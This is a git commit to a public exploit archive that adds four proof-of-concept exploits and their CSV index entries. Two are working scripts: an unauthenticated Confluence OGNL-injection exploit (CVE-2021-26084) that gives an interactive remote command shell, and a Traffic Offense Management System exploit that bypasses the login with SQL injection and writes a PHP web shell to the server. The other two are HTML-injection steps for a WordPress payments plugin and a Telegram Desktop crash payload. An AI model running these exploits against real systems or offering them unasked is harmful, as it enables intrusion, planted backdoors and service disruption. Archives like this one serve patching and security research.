DB: 2021-09-02

4 changes to exploits/shellcodes Telegram Desktop 2.9.2 - Denial of Service (PoC) Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated) Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection
2021-09-02 05:01:57 +00:00 · 2021-09-02 05:01:57 +00:00 · f3b60be22e
commit f3b60be22e
parent 688d558656
5 changed files with 194 additions and 0 deletions
--- a/exploits/java/webapps/50243.py
+++ b/exploits/java/webapps/50243.py
@ -0,0 +1,62 @@
+# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)
+# Date: 01/09/2021
+# Exploit Author: h3v0x
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: All < 7.12.x versions before 7.12.5
+# Tested on: Linux Distros 
+# CVE : CVE-2021-26084
+
+#!/usr/bin/python3
+
+# References: 
+# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
+# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
+
+import requests
+from bs4 import BeautifulSoup
+import optparse
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
+parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x")
+
+options, args = parser.parse_args()
+session = requests.Session()
+
+url_vuln = options.url
+endpoint = options.path
+
+if not options.url or not options.path:
+
+    print('[+] Specify an url target')
+    print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
+    print('[+] Example help usage: exploit.py -h')
+    exit()
+
+
+def banner():
+
+    print('---------------------------------------------------------------')
+    print('[-] Confluence Server Webwork OGNL injection')
+    print('[-] CVE-2021-26084')
+    print('[-] https://github.com/h3v0x')
+    print('--------------------------------------------------------------- \n')
+
+
+def cmdExec():
+
+    while True:
+        cmd = input('> ')
+        xpl_url = url_vuln + endpoint
+        xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate"}
+        xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
+        rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)
+
+        soup = BeautifulSoup(rawHTML.text, 'html.parser')
+        queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
+        print(queryStringValue)
+
+
+banner()
+cmdExec()
--- a/exploits/php/webapps/50244.py
+++ b/exploits/php/webapps/50244.py
@ -0,0 +1,73 @@
+# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
+# Date: 19.08.2021
+# Exploit Author: Tagoletta (Tağmaç)
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Tested on: Linux
+
+import requests
+import random
+import string
+import json
+from bs4 import BeautifulSoup
+
+url = input("TARGET = ")
+
+if not url.startswith('http://') and not url.startswith('https://'):
+    url = "http://" + url
+if not url.endswith('/'):
+    url = url + "/"
+
+payload= "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
+
+let = string.ascii_lowercase
+shellname = ''.join(random.choice(let) for i in range(15))
+
+
+session = requests.session()
+
+print("Login Bypass\n")
+
+request_url = url + "/classes/Login.php?f=login"
+post_data = {"username": "admin' or '1'='1'#", "password": ""}
+bypassUser = session.post(request_url, data=post_data)
+data = json.loads(bypassUser.text)
+status = data["status"]
+if status == "success":
+
+    print("Finding first driver\n")
+
+    getHTML = session.get(url + "admin/?page=drivers")
+    getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
+    findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id")
+
+    print("Found firs driver ID : " + findFirstDriverID)
+
+    print("\nFinding path")
+
+    findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'')
+    findPath = findPath.text[findPath.text.index("<b>Warning</b>:  ")+17:findPath.text.index("</b> on line ")]
+    findPath = findPath[findPath.index("<b>")+3:len(findPath)]
+
+    parser = findPath.split('\\')
+    parser.pop()
+    findPath = ""
+    for find in parser:
+        findPath += find + "/"
+
+    print("\nFound Path : " + findPath)
+    shellPath = findPath[findPath.index("admin/"):len(findPath)]
+
+    SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
+    SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
+    SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
+
+    print("\n\nShell Uploading...")
+    session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE)
+
+    print("\nShell Path : " + url+shellPath+shellname+".php")
+    shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami")
+    print("\n\nShell Output : "+shellOutput.text)
+
+else:
+    print("No bypass user")
--- a/exploits/php/webapps/50246.txt
+++ b/exploits/php/webapps/50246.txt
@ -0,0 +1,19 @@
+# Exploit Title: WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection
+# Date: 29/08/2021
+# Exploit Author: Niraj Mahajan
+# Software Link: https://wordpress.org/plugins/invoicing/
+# Version: 2.4.6
+# Tested on Windows
+
+*Steps to Reproduce:*
+1. Install Wordpress 5.8
+2. Install and Activate "WordPress Payments Plugin | GetPaid" Version 2.4.6
+3. Navigate to GetPaid > Payment Forms
+4. Click on "Add New" in the Payment Form page
+5. Add a title and Click on Billing Email
+6. You can see the "Help Text" field on the left hand side.
+7. Add the below HTML code into the "Help Text" Field.
+<img src="
+https://www.pandasecurity.com/en/mediacenter/src/uploads/2019/07/pandasecurity-How-do-hackers-pick-their-targets.jpg"
+height="200px" width="200px">
+8. You will observe that the HTML code has successfully got stored into the database and executed successfully and we are getting an Image at the right hand side.
--- a/exploits/windows/dos/50247.py
+++ b/exploits/windows/dos/50247.py
@ -0,0 +1,36 @@
+# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC)
+# Exploit Author: Aryan Chehreghani
+# Date: 2021-08-30
+# Vendor Homepage: https://telegram.org
+# Software Link: https://telegram.org/dl/desktop/win64
+# Tested Version: 2.9.2  x64
+# Tested on OS: Windows 10 Enterprise
+
+# [ About App ]
+
+#Telegram is a messaging app with a focus on speed and security, it’s super-fast, simple and free,
+#You can use Telegram on all your devices at the same time — your messages sync seamlessly across any number of your phones, tablets or computers.
+#Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world.
+#With Telegram, you can send messages, photos, videos and files of any type (doc, zip, mp3, etc), as well as create groups for up to 200,000 people or channels for broadcasting to unlimited audiences.
+#You can write to your phone contacts and find people by their usernames. As a result, 
+#Telegram is like SMS and email combined — and can take care of all your personal or business messaging needs,
+#Telegram is  support end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants.
+
+# [ POC ]
+
+# 1.Run the python script, it will create a new file "output.txt"
+# 2.Run Telegram Desktop and go to "Saved Messages"
+# 3.Copy the content of the file "output.txt"
+# 4.Paste the content of dos.txt into the "Write a message..."
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+buffer = "\x41" * 9000000
+try:
+    f=open("output.txt","w")
+    print("[!] Creating %s bytes DOS payload...." %len(buffer))
+    f.write(buffer)
+    f.close()
+    print("[!] File Created !")
+except:
+    print("File cannot be created")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6797,6 +6797,7 @@ id,file,description,date,author,type,platform,port
 50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios,
 50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios,
 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",2021-07-26,stresser,dos,windows,
+50247,exploits/windows/dos/50247.py,"Telegram Desktop 2.9.2 - Denial of Service (PoC)",2021-09-01,"Aryan Chehreghani",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -44367,3 +44368,6 @@ id,file,description,date,author,type,platform,port
 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,
 50241,exploits/aspx/webapps/50241.py,"Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)",2021-08-31,BitTheByte,webapps,aspx,
 50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",2021-08-31,"Numan Rajkotiya",webapps,php,
+50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",2021-09-01,"Fellipe Oliveira",webapps,java,
+50244,exploits/php/webapps/50244.py,"Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)",2021-09-01,Tagoletta,webapps,php,
+50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",2021-09-01,"Niraj Mahajan",webapps,php,